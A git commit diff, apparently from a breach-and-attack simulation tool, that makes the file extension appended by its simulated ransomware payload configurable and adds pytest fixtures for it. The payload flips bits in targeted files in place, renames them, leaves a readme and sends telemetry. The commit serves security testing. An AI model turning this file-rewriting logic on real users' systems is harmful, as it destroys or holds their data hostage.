Agent: Add file extension to ransomware

This commit is contained in:
Kekoa Kaaikala 2022-08-17 20:29:43 +00:00
parent 0797afb9a0
commit 880c2fe707
3 changed files with 16 additions and 9 deletions

View File

@ -26,8 +26,8 @@ def build_ransomware(options: dict):
logger.debug(f"Ransomware configuration:\n{pformat(options)}") logger.debug(f"Ransomware configuration:\n{pformat(options)}")
ransomware_options = RansomwareOptions(options) ransomware_options = RansomwareOptions(options)
file_encryptor = _build_file_encryptor() file_encryptor = _build_file_encryptor(ransomware_options.file_extension)
file_selector = _build_file_selector() file_selector = _build_file_selector(ransomware_options.file_extension)
leave_readme = _build_leave_readme() leave_readme = _build_leave_readme()
telemetry_messenger = _build_telemetry_messenger() telemetry_messenger = _build_telemetry_messenger()
@ -40,14 +40,15 @@ def build_ransomware(options: dict):
) )
def _build_file_encryptor(): def _build_file_encryptor(file_extension: str):
return InPlaceFileEncryptor( return InPlaceFileEncryptor(
encrypt_bytes=flip_bits, new_file_extension=EXTENSION, chunk_size=CHUNK_SIZE encrypt_bytes=flip_bits, new_file_extension=file_extension, chunk_size=CHUNK_SIZE
) )
def _build_file_selector(): def _build_file_selector(file_extension: str):
targeted_file_extensions = TARGETED_FILE_EXTENSIONS.copy() targeted_file_extensions = TARGETED_FILE_EXTENSIONS.copy()
if file_extension:
targeted_file_extensions.discard(EXTENSION) targeted_file_extensions.discard(EXTENSION)
return ProductionSafeTargetFileSelector(targeted_file_extensions) return ProductionSafeTargetFileSelector(targeted_file_extensions)

View File

@ -11,6 +11,11 @@ def patched_home_env(monkeypatch, tmp_path):
return tmp_path return tmp_path
@pytest.fixture(params=[".m0nk3y", ".test", ""], ids=["monkeyext", "testext", "noext"])
def ransomware_file_extension(request):
return request.param
@pytest.fixture @pytest.fixture
def ransomware_test_data(data_for_tests_dir): def ransomware_test_data(data_for_tests_dir):
return Path(data_for_tests_dir) / "ransomware_targets" return Path(data_for_tests_dir) / "ransomware_targets"

View File

@ -41,14 +41,15 @@ def build_ransomware(
@pytest.fixture @pytest.fixture
def ransomware_options(ransomware_test_data): def ransomware_options(ransomware_file_extension, ransomware_test_data):
class RansomwareOptionsStub(RansomwareOptions): class RansomwareOptionsStub(RansomwareOptions):
def __init__(self, encryption_enabled, readme_enabled, target_directory): def __init__(self, encryption_enabled, readme_enabled, file_extension, target_directory):
self.encryption_enabled = encryption_enabled self.encryption_enabled = encryption_enabled
self.readme_enabled = readme_enabled self.readme_enabled = readme_enabled
self.file_extension = file_extension
self.target_directory = target_directory self.target_directory = target_directory
return RansomwareOptionsStub(True, False, ransomware_test_data) return RansomwareOptionsStub(True, False, ransomware_file_extension, ransomware_test_data)
@pytest.fixture @pytest.fixture